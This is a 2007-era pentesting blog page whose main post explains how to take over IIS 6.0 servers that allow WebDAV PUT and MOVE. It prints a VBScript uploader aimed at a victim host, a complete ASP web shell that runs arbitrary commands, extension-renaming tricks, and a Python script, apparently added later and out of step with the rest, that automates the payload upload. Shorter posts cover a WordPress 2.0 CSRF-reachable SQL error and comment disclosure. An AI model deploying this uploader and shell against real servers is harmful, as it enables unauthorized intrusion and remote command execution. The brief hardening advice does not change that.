Recommended Books For Pentesting

June 30, 2007 Tools for Web App Testing | Comments (0) sid @ 7:46 pm

Although I don't have the habit of reading books, here are a few you may consider reading.

———– 

The Database Hacker's Handbook (David Litchfield et al.)

The Oracle Hacker's Handbook (David Litchfield)

Hacking Exposed Web Applications (TMH Publications)

Essential PHP Security (Chris Shiflett)

TCP/IP Illustrated (W. Richard Stevens)

Hacking Linux Exposed

——- 

As this list is really small, it is clear that I need to read more books. If you know any good book related to pentesting (or security in general), please share it with us.

Owning IIS 6.0 When Webserver Supports Put and Move HTTP Methods

June 14, 2007 Tools for Web App Testing, Research | Comments (1) sid @ 1:11 pm

Credits: ice and ferruh

On IIS 6.0 with WebDAV enabled you can upload backdoor scripts, but you may not be able to execute the default cmd.exe present on the IIS box, so you need to upload your own cmd.exe first and then make your ASP backdoor point to the cmd.exe you uploaded.

Steps:

1. Upload cmd.exe to the /scripts/ folder: use the script below, published at http://www.eggheadcafe.com/articles/20010829.asp, which uploads cmd.exe (or any other binary) to the vulnerable server with an HTTP PUT. You may not be able to upload a .exe file directly, so rename cmd.exe to cmd.txt, upload that, and then use the MOVE method to rename it back from cmd.txt to cmd.exe on the server. Note that cmd.exe must end up in the /scripts/ folder of IIS, which by default has execute permission.

Here is the upload script. It is an HTML page with client-side VBScript, so it has to be opened locally in Internet Explorer (it relies on the MSXML2.XMLHTTP and ADODB.Stream ActiveX objects); change the victim.com URL in sendit() to the target:

<script language="VBScript">
Dim strURL

' Read the chosen local file and PUT it to http://victim.com/scripts/<basename>
Function sendit(sFileName, sType)
    Dim sData, xmlhttp
    sData = getFileBytes(sFileName, sType)
    ' keep only the file name, drop the local directory part
    sFileName = Mid(sFileName, InStrRev(sFileName, "\") + 1, Len(sFileName))
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP.3.0")
    strURL = "http://victim.com/scripts/" & sFileName
    MsgBox "URL is: " & strURL
    xmlhttp.Open "PUT", strURL, False
    xmlhttp.Send sData
    show.innerText = "Status: " & xmlhttp.statusText
    Set xmlhttp = Nothing
End Function

Sub showresult()
    document.write "<CENTER>Take A look!<BR><A href=" & strURL & ">" & strURL & "</a></CENTER>"
End Sub

' Load the local file as binary (checkbox ticked) or as ASCII text
Function getFileBytes(flnm, sType)
    Dim objStream
    Set objStream = CreateObject("ADODB.Stream")
    If sType = "on" Then
        objStream.Type = 1 ' adTypeBinary
    Else
        objStream.Type = 2 ' adTypeText
        objStream.Charset = "ascii"
    End If
    objStream.Open
    objStream.LoadFromFile flnm
    If sType = "on" Then
        getFileBytes = objStream.Read
    Else
        getFileBytes = objStream.ReadText
    End If
    objStream.Close
    Set objStream = Nothing
End Function
</script>

<TABLE align=center>
<TR><TD><input type=FILE id=filedata></TD></TR>
<TR><TD><input type=submit onclick="Call sendit(filedata.value, filetype.value)"></TD></TR>
<TR><TD><input type=checkBox id=filetype checked>Type Binary (Uncheck for Type Text)</TD></TR>
<TR><TD><input type=button value="SHOW IT" onclick="showresult()"></TD></TR>
</TABLE>
<div id=show align=center></div>

2. Upload the cmd.asp file to the /scripts/ folder: use the same upload script, running locally on your system, to upload the cmd.asp shell from http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html:

<!-- IIS6 VBscript command shell -->
<!-- aramosf@unsec.net http://www.514.es -->
<title>514 aspshell</title>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="cmd" size=45 value="<%= cmd %>">
<input type=submit value="Run">
</FORM>
<%
' run the submitted command through cmd.exe and echo its stdout back, HTML-encoded
If (Request("cmd") <> "") Then
    Response.Write Server.HTMLEncode(Server.CreateObject("WScript.Shell").Exec(Server.MapPath("cmd.exe") & " /c " & Request("cmd")).StdOut.ReadAll)
End If
%>

You need to make the script point to the cmd.exe you uploaded to the scripts folder. You will need the absolute path, so the line:

Response.Write Server.HTMLEncode(Server.CreateObject("WScript.Shell").Exec(Server.MapPath("cmd.exe") & " /c " & Request("cmd")).StdOut.ReadAll)

may look something like:

Response.Write Server.HTMLEncode(Server.CreateObject("WScript.Shell").Exec("C:\Inetpub\Scripts\mycmd.exe /c " & Request("cmd")).StdOut.ReadAll)

You may not be able to upload the .asp file either, so rename it to .txt and use the MOVE method to rename it back to .asp on the server. That's it: your backdoor should work fine now :-)

Questions:

1. How do I obtain the absolute path? Add this line to your backdoor:

<%=Server.MapPath("/scripts/")%>

This prints the full filesystem path of the /scripts/ folder; make the necessary changes to your backdoor and upload it again.

————————–

2. What if the scripts directory is not present?

I think the attack will fail, as you won't have execute permission. Any other directory that is writable through PUT/MOVE and also has script or execute permission would do just as well, though.

—————————

3. Is it good practice not to have a /scripts/ folder in the document root?

Yes. More generally, no directory that WebDAV can write to should carry script or execute permission, and WebDAV (and with it PUT, MOVE, COPY and DELETE) should be disabled when it is not actually needed.

———————–
Syntax:
———————-
Example - PUT Method:

>>Request

PUT /foo.txt HTTP/1.1
Host: www.victim.com
Content-Length: 4

test

>>Response

HTTP/1.1 201 Created
Date: Thu, 14 Jun 2007 09:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.victim.com/foo.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

————————

Example - DELETE

>>Request

DELETE /container/ HTTP/1.1
Host: www.foo.bar

>>Response

HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset="utf-8"
Content-Length: xxxx

<?xml version="1.0" encoding="utf-8" ?>
<d:multistatus xmlns:d="DAV:">
  <d:response>
    <d:href>http://www.foo.bar/container/resource3</d:href>
    <d:status>HTTP/1.1 423 Locked</d:status>
  </d:response>
</d:multistatus>

————-

Example- MOVE
>>Request

   MOVE /~fielding/index.html HTTP/1.1
   Host: www.ics.uci.edu
   Destination: http://www.ics.uci.edu/users/f/fielding/index.html

>>Response

   HTTP/1.1 201 Created
   Location: http://www.ics.uci.edu/users/f/fielding/index.html

————

More HTTP methods (RFC 2518, WebDAV): http://www.webdav.org/specs/rfc2518.html
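The two-step upload above (PUT the payload under a harmless extension, then MOVE it onto its real name) and the raw PUT/MOVE syntax in the examples can be scripted without the browser page. The Python below is an added example and is not part of the original post or of the eggheadcafe/unsec.net scripts. The host, port and remote directory are placeholders, the Allow header and 201 response it is checked against are constructed from the examples above, and it only sends traffic when run from the command line against a server you are authorised to test.

```python
"""Added example (not from the original post): script the PUT-then-MOVE
upload described above and check a server's OPTIONS reply for write methods.
Host, port and paths are placeholders; all test data is constructed."""
from __future__ import annotations

import socket
import sys

# WebDAV/HTTP methods that let a client create, rename or change server content.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}


def parse_allow(allow_header: str) -> set[str]:
    """Split an Allow header value ('OPTIONS, TRACE, GET, ...') into method names."""
    return {m.strip().upper() for m in allow_header.split(",") if m.strip()}


def writable_methods(allow_header: str) -> set[str]:
    """Advertised methods that modify content; non-empty means PUT/MOVE-style abuse is possible."""
    return parse_allow(allow_header) & WRITE_METHODS


def put_request(host: str, path: str, body: bytes) -> bytes:
    """Raw PUT request, the same shape as the PUT example above."""
    head = (f"PUT {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Connection: close\r\n\r\n")
    return head.encode("ascii") + body


def move_request(host: str, src_path: str, dst_url: str) -> bytes:
    """Raw MOVE request; Destination is an absolute URL, as in the MOVE example (RFC 2518)."""
    return (f"MOVE {src_path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Destination: {dst_url}\r\n"
            "Overwrite: T\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def plan_upload(host: str, directory: str, name: str, payload: bytes) -> list[bytes]:
    """The post's two steps: PUT the file as .txt, then MOVE it onto its real extension."""
    base = name.rsplit(".", 1)[0]
    tmp_path = f"{directory}/{base}.txt"
    final_path = f"{directory}/{name}"
    return [put_request(host, tmp_path, payload),
            move_request(host, tmp_path, f"http://{host}{final_path}")]


def status_of(raw_response: bytes) -> int:
    """HTTP status code from a raw response; 201 Created means the PUT or MOVE succeeded."""
    status_line = raw_response.split(b"\r\n", 1)[0].decode("ascii", "replace")
    return int(status_line.split(" ")[1])


def allow_header_of(raw_response: bytes) -> str:
    """Value of the Allow header in a raw response, '' if absent."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("ascii", "replace")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "allow":
            return value.strip()
    return ""


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Send one raw request and read the whole response (network; not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # usage: python put_move.py <host> <port> <local file> <remote name>   (remote dir assumed /scripts)
    host, port, local, remote = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    options = f"OPTIONS / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode("ascii")
    allowed = writable_methods(allow_header_of(send_raw(host, port, options)))
    print("write methods advertised:", sorted(allowed) or "none")
    if {"PUT", "MOVE"} <= allowed:
        with open(local, "rb") as f:
            payload = f.read()
        for req in plan_upload(host, "/scripts", remote, payload):
            print(req.split(b"\r\n", 1)[0].decode(), "->", status_of(send_raw(host, port, req)))
```

The OPTIONS check doubles as a quick defensive test: an Allow header that still lists PUT, MOVE, COPY or DELETE on a production IIS 6 box means WebDAV write access has not been switched off.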
————

Undisclosed Wordpress 2.0 Security Issues

June 5, 2007 Advisories, Research | Comments (0) admin @ 2:21 pm

I recently came across this security advisory and decided to find out what the undisclosed issues could be. I downloaded WordPress 2.0 to find these undisclosed issues. Why I am interested in WordPress 2.0 is a different story, though. :)
It was trivial to figure out that this version has no protection against CSRF attacks. The file wp-admin/options-reading.php has a parameter posts_per_rss that seems to have been left unsanitized. It is possible to make an admin submit (via CSRF) a malicious value of this parameter, which will eventually result in a database error. However, the injection seems really difficult to exploit.

Example: http://192.168.1.183:80/apache2-default/wordpress/?feed=rss2

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2007-01-08 04:12:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT 0, 10'

As the injection point is after LIMIT, and because of the ORDER BY clause, I think it is not exploitable.
If you think it is indeed exploitable, drop me an email now…

Wordpress Unauthorized Comment Disclosure

June 1, 2007 News | Comments (0) admin @ 7:05 am

By enumerating the name and email address of a comment author, an attacker can read the comment submitted by that author while it still awaits approval and publication by an administrator. This again points to the need for better session management in WordPress. Read the full story here.